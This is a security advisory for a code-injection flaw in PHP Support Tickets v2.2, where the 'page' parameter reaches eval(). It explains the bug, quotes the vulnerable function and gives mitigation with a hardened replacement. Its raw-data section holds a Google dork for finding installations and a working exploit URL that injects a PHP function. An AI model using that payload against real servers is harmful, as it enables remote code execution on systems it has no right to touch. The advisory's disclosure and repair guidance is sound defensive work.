Vendor: PHP Support Tickets
Author: brain[pillow]
CVSS: 7.5 (HIGH)
Impact: Code Execution
CWE: 78
Product Name: PHP Support Tickets
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Year: 2010

PHP Support Tickets v2.2 Code Exec

This exploit allows an attacker to execute arbitrary PHP code on a PHP Support Tickets v2.2 installation. The 'page' parameter of 'index.php' is uppercased and concatenated, without validation, into a string that getPageName() (in /classes/GUI/abstract.GUI.php) passes to eval(), so an attacker who controls that parameter can inject PHP source and have the server execute it.

Mitigation:

Upgrade to a version of PHP Support Tickets that has patched this vulnerability, if one is available. Otherwise, remove the eval() call: validate the 'page' parameter against an allow-list of known page keys before use, and resolve the page name with a lookup (for example constant() on a validated constant name) rather than building PHP source from user input.
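As an added illustration (not code from the advisory or from the PHP Support Tickets project), the following shows a hardened replacement for getPageName() that resolves the page name without eval(); the PageGui class, the two sample constants and the input values are constructed for this example.

```php
<?php
// Added example, not part of the original advisory or project code.
// Constant names, the PageGui class and the inputs below are assumptions.

define('PHPST_PAGENAME_HOME', 'Home');
define('PHPST_PAGENAME_TICKETS', 'My Tickets');

final class PageGui
{
    /** Allow-list of page keys that may be mapped to a constant name. */
    private const PAGES = ['home', 'tickets'];

    public function __construct(private string $page) {}

    /**
     * Safe lookup: the request value is checked against a strict allow-list,
     * and the constant is read with constant() instead of eval()'ing a string
     * that contains user input. Anything outside the list fails closed.
     */
    public function getPageName(): string
    {
        $key = strtolower($this->page);
        if (!in_array($key, self::PAGES, true)) {
            // Unknown or malformed page key: never reaches any code evaluation.
            return 'Unknown';
        }
        $const = 'PHPST_PAGENAME_' . strtoupper($key);
        return defined($const) ? constant($const) : 'Unknown';
    }
}

// Constructed inputs: two legitimate keys and one malformed value carrying
// PHP syntax characters, as an attacker-controlled 'page' parameter might.
foreach (['home', 'TICKETS', 'home();x'] as $input) {
    printf("%-12s => %s\n", $input, (new PageGui($input))->getPageName());
}
```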

Exploit-DB raw data:

# Exploit Title: PHP Support Tickets v2.2 Code Exec
# Google Dork: "PHP Support Tickets v2.2"
# Date: 26.09.2010
# Author: brain[pillow]
# Software Link: http://www.phpsupporttickets.com/
# Version: 2.2

====================================================================
# Vuln. code:

/classes/GUI/abstract.GUI.php

    // $this->page is taken from the 'page' request parameter; it is uppercased
    // and spliced directly into PHP source, which eval() then executes.
    public function getPageName() {
        return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';');
    }

====================================================================
# Exploit:

/index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}